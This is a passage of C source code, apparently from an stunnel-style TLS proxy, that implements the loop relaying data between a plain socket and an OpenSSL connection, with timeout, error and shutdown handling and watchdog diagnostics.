c->sock_ptr = c->ssl_ptr = 0;
do {
read_wants_read =
!(SSL_get_shutdown(c->ssl) & SSL_RECEIVED_SHUTDOWN)
&& c->ssl_ptr < BUFFSIZE && !read_wants_write;
write_wants_write =
!(SSL_get_shutdown(c->ssl) & SSL_SENT_SHUTDOWN)
&& c->sock_ptr && !write_wants_read;
s_poll_init(c->fds);
if (sock_open_rd)
s_poll_add(c->fds, c->sock_rfd->fd,
c->sock_ptr < BUFFSIZE, 0);
if (sock_open_wr)
s_poll_add(c->fds, c->sock_wfd->fd, 0, c->ssl_ptr);
if (read_wants_read || write_wants_read || shutdown_wants_read)
s_poll_add(c->fds, c->ssl_rfd->fd, 1, 0);
if (read_wants_write || write_wants_write
|| shutdown_wants_write)
s_poll_add(c->fds, c->ssl_wfd->fd, 0, 1);
err = s_poll_wait(c->fds, (sock_open_rd &&
!(SSL_get_shutdown(c->ssl) &
SSL_RECEIVED_SHUTDOWN))
|| c->ssl_ptr
||
c->sock_ptr
?
c->opt->timeout_idle : c->opt->timeout_close,
0);
switch (err) {
case -1:
sockerror("transfer: s_poll_wait");
longjmp(c->err, 1);
case 0:
if ((sock_open_rd &&
!(SSL_get_shutdown(c->ssl) &
SSL_RECEIVED_SHUTDOWN)) || c->ssl_ptr
|| c->sock_ptr) {
s_log(LOG_INFO,
"transfer: s_poll_wait:"
" TIMEOUTidle exceeded: sending reset");
longjmp(c->err, 1);
} else {
s_log(LOG_ERR, "transfer: s_poll_wait:"
" TIMEOUTclose exceeded: closing");
return;
}
}
err = s_poll_error(c->fds, c->sock_rfd);
if (err) {
s_log(LOG_NOTICE,
"Error detected on socket (read) file descriptor: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
if (c->sock_wfd->fd != c->sock_rfd->fd) {
err = s_poll_error(c->fds, c->sock_wfd);
if (err) {
s_log(LOG_NOTICE,
"Error detected on socket write file descriptor: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
}
err = s_poll_error(c->fds, c->ssl_rfd);
if (err) {
s_log(LOG_NOTICE,
"Error detected on SSL (read) file descriptor: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
if (c->ssl_wfd->fd != c->ssl_rfd->fd) {
err = s_poll_error(c->fds, c->ssl_wfd);
if (err) {
s_log(LOG_NOTICE,
"Error detected on SSL write file descriptor: %s (%d)",
s_strerror(err), err);
longjmp(c->err, 1);
}
}
sock_can_rd = s_poll_canread(c->fds, c->sock_rfd->fd);
sock_can_wr = s_poll_canwrite(c->fds, c->sock_wfd->fd);
ssl_can_rd = s_poll_canread(c->fds, c->ssl_rfd->fd);
ssl_can_wr = s_poll_canwrite(c->fds, c->ssl_wfd->fd);
if (!(sock_can_rd || sock_can_wr || ssl_can_rd || ssl_can_wr)) {
s_log(LOG_ERR, "INTERNAL ERROR: "
"s_poll_wait returned %d, but no descriptor is ready",
err);
longjmp(c->err, 1);
}
if (shutdown_wants_read || shutdown_wants_write) {
num = SSL_shutdown(c->ssl);
if (num < 0)
err = SSL_get_error(c->ssl, num);
else
err = SSL_ERROR_NONE;
switch (err) {
case SSL_ERROR_NONE:
s_log(LOG_INFO,
"SSL_shutdown successfully sent close_notify alert");
shutdown_wants_read = shutdown_wants_write = 0;
break;
case SSL_ERROR_SYSCALL:
if (parse_socket_error(c, "SSL_shutdown"))
break;
SSL_set_shutdown(c->ssl,
SSL_SENT_SHUTDOWN |
SSL_RECEIVED_SHUTDOWN);
shutdown_wants_read = shutdown_wants_write = 0;
break;
case SSL_ERROR_WANT_WRITE:
s_log(LOG_DEBUG,
"SSL_shutdown returned WANT_WRITE: retrying");
shutdown_wants_read = 0;
shutdown_wants_write = 1;
break;
case SSL_ERROR_WANT_READ:
s_log(LOG_DEBUG,
"SSL_shutdown returned WANT_READ: retrying");
shutdown_wants_read = 1;
shutdown_wants_write = 0;
break;
case SSL_ERROR_SSL:
sslerror("SSL_shutdown");
longjmp(c->err, 1);
default:
s_log(LOG_ERR,
"SSL_shutdown/SSL_get_error returned %d",
err);
longjmp(c->err, 1);
}
}
if (sock_open_rd && sock_can_rd) {
num = readsocket(c->sock_rfd->fd,
c->sock_buff + c->sock_ptr,
BUFFSIZE - c->sock_ptr);
switch (num) {
case -1:
if (parse_socket_error(c, "readsocket"))
break;
case 0:
s_log(LOG_DEBUG, "Socket closed on read");
sock_open_rd = 0;
break;
default:
c->sock_ptr += num;
watchdog = 0;
}
}
if (sock_open_wr && sock_can_wr) {
num =
writesocket(c->sock_wfd->fd, c->ssl_buff,
c->ssl_ptr);
switch (num) {
case -1:
if (parse_socket_error(c, "writesocket"))
break;
case 0:
s_log(LOG_DEBUG, "Socket closed on write");
sock_open_rd = sock_open_wr = 0;
break;
default:
memmove(c->ssl_buff, c->ssl_buff + num,
c->ssl_ptr - num);
c->ssl_ptr -= num;
c->sock_bytes += num;
watchdog = 0;
}
}
read_wants_read =
!(SSL_get_shutdown(c->ssl) & SSL_RECEIVED_SHUTDOWN)
&& c->ssl_ptr < BUFFSIZE && !read_wants_write;
write_wants_write =
!(SSL_get_shutdown(c->ssl) & SSL_SENT_SHUTDOWN)
&& c->sock_ptr && !write_wants_read;
if ((read_wants_read && (ssl_can_rd || SSL_pending(c->ssl))) ||
(read_wants_write && ssl_can_wr)) {
read_wants_write = 0;
num =
SSL_read(c->ssl, c->ssl_buff + c->ssl_ptr,
BUFFSIZE - c->ssl_ptr);
switch (err = SSL_get_error(c->ssl, num)) {
case SSL_ERROR_NONE:
if (num == 0)
s_log(LOG_DEBUG, "SSL_read returned 0");
c->ssl_ptr += num;
watchdog = 0;
break;
case SSL_ERROR_WANT_WRITE:
s_log(LOG_DEBUG,
"SSL_read returned WANT_WRITE: retrying");
read_wants_write = 1;
break;
case SSL_ERROR_WANT_READ:
break;
case SSL_ERROR_WANT_X509_LOOKUP:
s_log(LOG_DEBUG,
"SSL_read returned WANT_X509_LOOKUP: retrying");
break;
case SSL_ERROR_SYSCALL:
if (num && parse_socket_error(c, "SSL_read"))
break;
if (c->sock_ptr) {
s_log(LOG_ERR,
"SSL socket closed on SSL_read with %d unsent byte(s)",
c->sock_ptr);
longjmp(c->err, 1);
}
s_log(LOG_DEBUG,
"SSL socket closed on SSL_read");
SSL_set_shutdown(c->ssl,
SSL_SENT_SHUTDOWN |
SSL_RECEIVED_SHUTDOWN);
break;
case SSL_ERROR_ZERO_RETURN:
s_log(LOG_DEBUG, "SSL closed on SSL_read");
if (SSL_version(c->ssl) == SSL2_VERSION)
SSL_set_shutdown(c->ssl,
SSL_SENT_SHUTDOWN |
SSL_RECEIVED_SHUTDOWN);
break;
case SSL_ERROR_SSL:
sslerror("SSL_read");
longjmp(c->err, 1);
default:
s_log(LOG_ERR,
"SSL_read/SSL_get_error returned %d",
err);
longjmp(c->err, 1);
}
}
if ((write_wants_read && ssl_can_rd) ||
(write_wants_write && ssl_can_wr)) {
write_wants_read = 0;
num = SSL_write(c->ssl, c->sock_buff, c->sock_ptr);
switch (err = SSL_get_error(c->ssl, num)) {
case SSL_ERROR_NONE:
if (num == 0)
s_log(LOG_DEBUG,
"SSL_write returned 0");
memmove(c->sock_buff, c->sock_buff + num,
c->sock_ptr - num);
c->sock_ptr -= num;
c->ssl_bytes += num;
watchdog = 0;
break;
case SSL_ERROR_WANT_WRITE:
break;
case SSL_ERROR_WANT_READ:
s_log(LOG_DEBUG,
"SSL_write returned WANT_READ: retrying");
write_wants_read = 1;
break;
case SSL_ERROR_WANT_X509_LOOKUP:
s_log(LOG_DEBUG,
"SSL_write returned WANT_X509_LOOKUP: retrying");
break;
case SSL_ERROR_SYSCALL:
if (num && parse_socket_error(c, "SSL_write"))
break;
if (c->sock_ptr) {
s_log(LOG_ERR,
"SSL socket closed on SSL_write with %d unsent byte(s)",
c->sock_ptr);
longjmp(c->err, 1);
}
s_log(LOG_DEBUG,
"SSL socket closed on SSL_write");
SSL_set_shutdown(c->ssl,
SSL_SENT_SHUTDOWN |
SSL_RECEIVED_SHUTDOWN);
break;
case SSL_ERROR_ZERO_RETURN:
s_log(LOG_DEBUG, "SSL closed on SSL_write");
if (SSL_version(c->ssl) == SSL2_VERSION)
SSL_set_shutdown(c->ssl,
SSL_SENT_SHUTDOWN |
SSL_RECEIVED_SHUTDOWN);
break;
case SSL_ERROR_SSL:
sslerror("SSL_write");
longjmp(c->err, 1);
default:
s_log(LOG_ERR,
"SSL_write/SSL_get_error returned %d",
err);
longjmp(c->err, 1);
}
}
if (sock_open_wr
&& SSL_get_shutdown(c->ssl) & SSL_RECEIVED_SHUTDOWN
&& !c->ssl_ptr) {
sock_open_wr = 0;
if (!c->sock_wfd->is_socket) {
s_log(LOG_DEBUG,
"Closing the socket file descriptor");
sock_open_rd = 0;
} else if (!shutdown(c->sock_wfd->fd, SHUT_WR)) {
s_log(LOG_DEBUG, "Sent socket write shutdown");
} else {
s_log(LOG_DEBUG,
"Failed to send socket write shutdown");
sock_open_rd = 0;
}
}
if (!(SSL_get_shutdown(c->ssl) & SSL_SENT_SHUTDOWN)
&& !sock_open_rd && !c->sock_ptr) {
if (SSL_version(c->ssl) != SSL2_VERSION) {
s_log(LOG_DEBUG, "Sending close_notify alert");
shutdown_wants_write = 1;
} else {
s_log(LOG_DEBUG, "Closing SSLv2 socket");
if (c->ssl_rfd->is_socket)
shutdown(c->ssl_rfd->fd, SHUT_RD);
if (c->ssl_wfd->is_socket)
shutdown(c->ssl_wfd->fd, SHUT_WR);
SSL_set_shutdown(c->ssl,
SSL_SENT_SHUTDOWN |
SSL_RECEIVED_SHUTDOWN);
}
}
if (++watchdog > 100) {
s_log(LOG_ERR,
"transfer() loop executes not transferring any data");
wifisec_info(LOG_ERR);
s_log(LOG_ERR, "protocol=%s, SSL_pending=%d",
SSL_get_version(c->ssl), SSL_pending(c->ssl));
s_log(LOG_ERR, "sock_open_rd=%s, sock_open_wr=%s",
sock_open_rd ? "Y" : "n",
sock_open_wr ? "Y" : "n");
s_log(LOG_ERR,
"SSL_RECEIVED_SHUTDOWN=%s, SSL_SENT_SHUTDOWN=%s",
SSL_get_shutdown(c->ssl) & SSL_RECEIVED_SHUTDOWN ?
"Y" : "n",
SSL_get_shutdown(c->ssl) & SSL_SENT_SHUTDOWN ? "Y"
: "n");
s_log(LOG_ERR, "sock_can_rd=%s, sock_can_wr=%s",
sock_can_rd ? "Y" : "n", sock_can_wr ? "Y" : "n");
s_log(LOG_ERR, "ssl_can_rd=%s, ssl_can_wr=%s",
ssl_can_rd ? "Y" : "n", ssl_can_wr ? "Y" : "n");
s_log(LOG_ERR,
"read_wants_read=%s, read_wants_write=%s",
read_wants_read ? "Y" : "n",
read_wants_write ? "Y" : "n");
s_log(LOG_ERR,
"write_wants_read=%s, write_wants_write=%s",
write_wants_read ? "Y" : "n",
write_wants_write ? "Y" : "n");
s_log(LOG_ERR,
"shutdown_wants_read=%s, shutdown_wants_write=%s",
shutdown_wants_read ? "Y" : "n",
shutdown_wants_write ? "Y" : "n");
s_log(LOG_ERR,
"socket input buffer: %d byte(s), "
"ssl input buffer: %d byte(s)", c->sock_ptr,
c->ssl_ptr);
longjmp(c->err, 1);
}
} while (sock_open_wr || !(SSL_get_shutdown(c->ssl) & SSL_SENT_SHUTDOWN)
|| shutdown_wants_read || shutdown_wants_write);
}